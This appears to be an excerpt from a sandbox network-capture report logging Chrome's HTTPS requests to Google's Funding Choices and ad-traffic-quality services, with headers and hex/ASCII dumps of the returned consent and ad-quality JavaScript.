2024-10-31 18:19:41 UTC	976	OUT	GET /f/AGSKWxVliFzt__e0MUU_SOrGx-lhlS6uQAPdw7fuvmC9ZOEsgVNDhFt6QsFFNlaOQwy5PSsxhxcDWnH1x8vkCo4uTDzz2qaGDiiWUxEb4DdVXaVIkxYLejIwjKuC0DHCYaFx6xUnkqAxgw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzczLDk4NTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNV0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl0sWzIsIltudWxsLFtudWxsLDEsWzE3MzAzOTg3NzQsMjY1MzU5MDAwXV1dIl1dXQ HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:41 UTC	1936	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:41 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-231Lw3WGQi_Fn5dwUPALgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Cross-Origin-Resource-Policy: cross-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw05BikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhbg59k7p38kmsGJBq4eSRlJ-YXxyfl5JUWZSaUl-UVpyWmpxalFZalG8kYGRiaGBsYGegUF8gQEAINQ-6w" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 62 39 38 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 6a 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 6a 44 2c 5f 2e Data Ascii: b98if (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{var jD=function(a){this.l=_.t(a)};_.v(jD,_.
2024-10-31 18:19:41 UTC	1039	IN	Data Raw: 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 57 44 4c 39 4e 4c 5a 5a 75 78 6c 30 6f 59 55 34 71 7a 47 76 54 76 55 4c 6c 39 70 59 71 50 45 5a 71 4f 76 75 41 7a 72 36 36 66 58 6e 62 5f 39 6c 64 66 33 72 34 52 4b 74 42 4c 65 4d 6a 48 77 5f 74 57 42 6b 6e 64 6f 59 64 64 75 54 38 55 32 53 7a 5f 79 73 4f 32 48 76 71 6e 4a 2d 6b 45 68 58 77 72 74 6b 6b 61 5a 41 54 36 37 71 52 54 72 65 33 6e 6e 30 62 54 35 6a 6e 42 4b 6c 6b 69 6b 79 6f 69 6a 4b 69 30 56 51 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 5c 78 35 62 6e 75 6c 6c 2c 5c 78 35 62 37 2c 36 2c 31 35 5c 78 35 64 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: \/fundingchoicesmessages.google.com\/f\/AGSKWxWDL9NLZZuxl0oYU4qzGvTvULl9pYqPEZqOvuAzr66fXnb_9ldf3r4RKtBLeMjHw_tWBkndoYdduT8U2Sz_ysO2HvqnJ-kEhXwrtkkaZAT67qRTre3nn0bT5jnBKlkikyoijKi0VQ\\\\u003d\\\\u003d\\\x22\x5d,\x5bnull,\x5b7,6,15\x5d,null,null,null,null,
2024-10-31 18:19:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49994	142.250.186.174	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:41 UTC	974	OUT	GET /f/AGSKWxUB99RlJ_8i7LLI3oNTdMLmCw2CQVqckIxJK9gf-02-WMpmqGqaY-w86Dc5gRTrOlzGhRgGU2qqZ_W1MTy0YY21viTL3rQc18HIx6JgnCbhVFUEjsqMaMITOmSLmaXPdGl8WFcYzw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4Nzc1LDY4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNSw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXSxbMTgsIltbWzFdXV0iXSxbMiwiW251bGwsW251bGwsMSxbMTczMDM5ODc3NCwyNjUzNTkwMDBdXV0iXV1d HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:41 UTC	1936	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:41 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-YpoEndcAtJMs3_ouGUJ93A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw1pBikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhbg59k7p38kmcGLWMn8ljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAKo4_Kg" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:41 UTC	1936	IN	Data Raw: 64 33 62 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 4e 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 4e 6f 2c 5f 2e Data Ascii: d3bif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{var No=function(a){this.l=_.t(a)};_.v(No,_.
2024-10-31 18:19:41 UTC	1458	IN	Data Raw: 74 41 43 6f 39 6c 4c 39 46 43 50 68 38 57 58 5f 50 6f 45 44 77 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 6e 75 6c 6c 2c 5c 78 35 62 5c 78 35 62 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 78 32 32 68 74 74 70 73 3a 5c 2f 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 57 62 51 42 39 7a 4c 6f 73 56 44 4f 4a 38 41 64 32 4a 67 71 63 6d 34 55 2d 5f 4f 30 58 32 54 42 48 38 70 34 75 6c 50 45 4d 52 64 36 65 5f 44 71 34 63 5a 75 4b 74 51 53 61 45 53 41 4f 35 37 57 37 4f 42 6e 4d 64 62 50 76 4c 66 55 4e 34 2d 31 33 4d 49 4b 67 4c 4a 49 38 51 30 31 37 56 39 69 51 6a 73 4b 4c 69 66 38 56 76 42 41 52 47 4d 76 51 30 64 68 4d Data Ascii: tACo9lL9FCPh8WX_PoEDw\\\\u003d\\\\u003d\\\x22\x5d,null,\x5b\x5bnull,null,null,\\\x22https:\/\/fundingchoicesmessages.google.com\/f\/AGSKWxWbQB9zLosVDOJ8Ad2Jgqcm4U-_O0X2TBH8p4ulPEMRd6e_Dq4cZuKtQSaESAO57W7OBnMdbPvLfUN4-13MIKgLJI8Q017V9iQjsKLif8VvBARGMvQ0dhM
2024-10-31 18:19:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50018	216.58.206.65	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:41 UTC	537	OUT	GET /sodar/sodar2.js HTTP/1.1 Host: ep2.adtrafficquality.google Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:41 UTC	665	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/javascript Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="adspam-signals-scs" Report-To: {"group":"adspam-signals-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/adspam-signals-scs"}]} Content-Length: 17945 Date: Thu, 31 Oct 2024 18:19:41 GMT Expires: Thu, 31 Oct 2024 18:19:41 GMT Cache-Control: private, max-age=3000 ETag: "1727224258380615" X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-31 18:19:41 UTC	713	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 66 75 6e 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 76 61 72 20 6b 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 Data Ascii: (function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return
2024-10-31 18:19:41 UTC	1378	IN	Data Raw: 64 20 30 3f 63 3a 61 5b 62 5d 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 78 28 61 2c 62 2c 63 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 64 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 64 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 67 3d 64 5b 30 5d 2c 66 3b 21 61 26 26 67 20 69 6e 20 72 3f 66 3d 72 3a 66 3d 6e 3b 66 6f 72 28 67 3d 30 3b 67 3c 64 2e 6c 65 6e 67 74 68 2d 31 3b 67 2b 2b 29 7b 76 61 72 20 65 3d 64 5b 67 5d 3b 69 66 28 21 28 65 20 69 6e 20 66 29 29 62 72 65 61 6b 20 61 3b 66 3d 66 5b 65 5d 7d 64 3d 64 5b 64 2e 6c 65 6e 67 74 68 2d 31 5d 3b 63 3d 70 26 26 63 3d 3d 3d 22 65 73 36 22 3f 66 5b 64 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 63 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 6b 28 72 2c 64 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 Data Ascii: d 0?c:a[b]}}function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,wr
2024-10-31 18:19:41 UTC	1378	IN	Data Raw: 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 72 2e 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 77 28 72 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 26 26 61 5b 77 28 72 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 61 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 61 29 2b 22 20 69 73 20 6e 6f 74 20 61 6e 20 69 74 65 72 61 62 6c 65 20 6f 72 20 41 72 72 61 79 4c 69 6b 65 22 29 3b 7d 76 61 72 20 66 61 3d 74 79 70 65 6f 66 20 4f Data Ascii: ;return a}function ea(a){var b=typeof r.Symbol!="undefined"&&w(r.Symbol,"iterator")&&a[w(r.Symbol,"iterator")];if(b)return b.call(a);if(typeof a.length=="number")return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}var fa=typeof O
2024-10-31 18:19:41 UTC	1378	IN	Data Raw: 3a 21 30 7d 7d 2c 62 2c 61 2e 67 2e 72 65 74 75 72 6e 29 3b 61 2e 67 2e 72 65 74 75 72 6e 28 62 29 3b 72 65 74 75 72 6e 20 48 28 61 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 47 28 61 2c 62 2c 63 2c 64 29 7b 74 72 79 7b 76 61 72 20 67 3d 62 2e 63 61 6c 6c 28 61 2e 67 2e 68 2c 63 29 3b 69 66 28 21 28 67 20 69 6e 73 74 61 6e 63 65 6f 66 20 4f 62 6a 65 63 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 74 65 72 61 74 6f 72 20 72 65 73 75 6c 74 20 22 2b 67 2b 22 20 69 73 20 6e 6f 74 20 61 6e 20 6f 62 6a 65 63 74 22 29 3b 69 66 28 21 67 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 61 2e 67 2e 6d 3d 21 31 2c 67 3b 76 61 72 20 66 3d 67 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 67 2e 68 3d 6e 75 6c 6c 2c 45 28 61 2e Data Ascii: :!0}},b,a.g.return);a.g.return(b);return H(a)}function G(a,b,c,d){try{var g=b.call(a.g.h,c);if(!(g instanceof Object))throw new TypeError("Iterator result "+g+" is not an object");if(!g.done)return a.g.m=!1,g;var f=g.value}catch(e){return a.g.h=null,E(a.
2024-10-31 18:19:41 UTC	1378	IN	Data Raw: 65 6f 66 20 62 3f 65 3a 6e 65 77 20 62 28 66 75 6e 63 74 69 6f 6e 28 68 29 7b 68 28 65 29 7d 29 7d 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 68 69 73 2e 67 3d 3d 6e 75 6c 6c 29 7b 74 68 69 73 2e 67 3d 5b 5d 3b 76 61 72 20 68 3d 74 68 69 73 3b 74 68 69 73 2e 69 28 66 75 6e 63 74 69 6f 6e 28 29 7b 68 2e 6d 28 29 7d 29 7d 74 68 69 73 2e 67 2e 70 75 73 68 28 65 29 7d 3b 76 61 72 20 67 3d 6e 2e 73 65 74 54 69 6d 65 6f 75 74 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 67 28 65 2c 30 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 74 68 69 73 2e 67 26 26 74 68 69 73 2e 67 2e 6c 65 6e 67 Data Ascii: eof b?e:new b(function(h){h(e)})}if(a)return a;c.prototype.h=function(e){if(this.g==null){this.g=[];var h=this;this.i(function(){h.m()})}this.g.push(e)};var g=n.setTimeout;c.prototype.i=function(e){g(e,0)};c.prototype.m=function(){for(;this.g&&this.g.leng
2024-10-31 18:19:41 UTC	1378	IN	Data Raw: 74 6f 6d 45 76 65 6e 74 2c 68 3d 6e 2e 45 76 65 6e 74 2c 6c 3d 6e 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3b 69 66 28 74 79 70 65 6f 66 20 6c 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 72 65 74 75 72 6e 21 30 3b 74 79 70 65 6f 66 20 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 65 3d 6e 65 77 20 65 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 68 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 65 3d 6e 65 77 20 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 65 3d 6e 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 65 2e 69 6e 69 74 Data Ascii: tomEvent,h=n.Event,l=n.dispatchEvent;if(typeof l==="undefined")return!0;typeof e==="function"?e=new e("unhandledrejection",{cancelable:!0}):typeof h==="function"?e=new h("unhandledrejection",{cancelable:!0}):(e=n.document.createEvent("CustomEvent"),e.init
2024-10-31 18:19:41 UTC	1378	IN	Data Raw: 30 26 26 6d 28 74 29 7d 7d 76 61 72 20 74 3d 5b 5d 2c 76 3d 30 3b 64 6f 20 74 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 76 2b 2b 2c 64 28 6c 2e 76 61 6c 75 65 29 2e 43 28 4f 28 74 2e 6c 65 6e 67 74 68 2d 31 29 2c 71 29 2c 6c 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6c 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 62 7d 2c 22 65 73 36 22 29 3b 0a 78 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 6e 7d 2c 22 65 73 5f 32 30 32 30 22 29 3b 78 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 Data Ascii: 0&&m(t)}}var t=[],v=0;do t.push(void 0),v++,d(l.value).C(O(t.length-1),q),l=h.next();while(!l.done)})};return b},"es6");x("globalThis",function(a){return a\|\|n},"es_2020");x("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){retur
2024-10-31 18:19:41 UTC	1378	IN	Data Raw: 3b 64 3c 62 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 63 2b 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 64 5d 29 2b 61 5b 64 2b 31 5d 3b 72 65 74 75 72 6e 20 4c 28 63 29 7d 3b 76 61 72 20 73 61 3d 79 28 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 32 2f 61 66 72 61 6d 65 22 5d 29 2c 74 61 3d 50 28 73 61 29 3b 66 75 6e 63 74 69 6f 6e 20 51 28 61 2c 62 2c 63 29 7b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 21 31 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 61 28 61 2c 62 29 7b 61 2e 73 72 63 3d 72 61 28 62 29 3b 76 61 72 20 63 2c 64 3b 28 63 3d 28 62 3d 28 64 3d 28 63 3d 28 61 2e 6f 77 6e 65 72 Data Ascii: ;d<b.length;d++)c+=encodeURIComponent(b[d])+a[d+1];return L(c)};var sa=y(["https://www.google.com/recaptcha/api2/aframe"]),ta=P(sa);function Q(a,b,c){a.addEventListener&&a.addEventListener(b,c,!1)};function ua(a,b){a.src=ra(b);var c,d;(c=(b=(d=(c=(a.owner
2024-10-31 18:19:41 UTC	1378	IN	Data Raw: 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 62 67 2f 22 2c 22 2e 6a 73 22 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 52 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 67 3d 77 69 6e 64 6f 77 3b 67 3d 67 3d 3d 3d 76 6f 69 64 20 30 3f 77 69 6e 64 6f 77 3a 67 3b 74 68 69 73 2e 4a 3d 62 3b 74 68 69 73 2e 68 3d 67 3b 74 68 69 73 2e 6f 3d 63 3d 3d 3d 76 6f 69 64 20 30 3f 30 3a 63 3b 74 68 69 73 2e 69 3d 28 64 3d 3d 3d 76 6f 69 64 20 30 3f 30 3a 64 29 3f 50 28 7a 61 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 29 3a 50 28 41 61 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 61 28 61 29 7b 72 65 74 75 72 6e 20 49 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 73 77 69 74 63 Data Ascii: ad2.googlesyndication.com/bg/",".js"]);function R(a,b,c,d){var g=window;g=g===void 0?window:g;this.J=b;this.h=g;this.o=c===void 0?0:c;this.i=(d===void 0?0:d)?P(za,encodeURIComponent(a)):P(Aa,encodeURIComponent(a))}function Ba(a){return I(function(b){switc
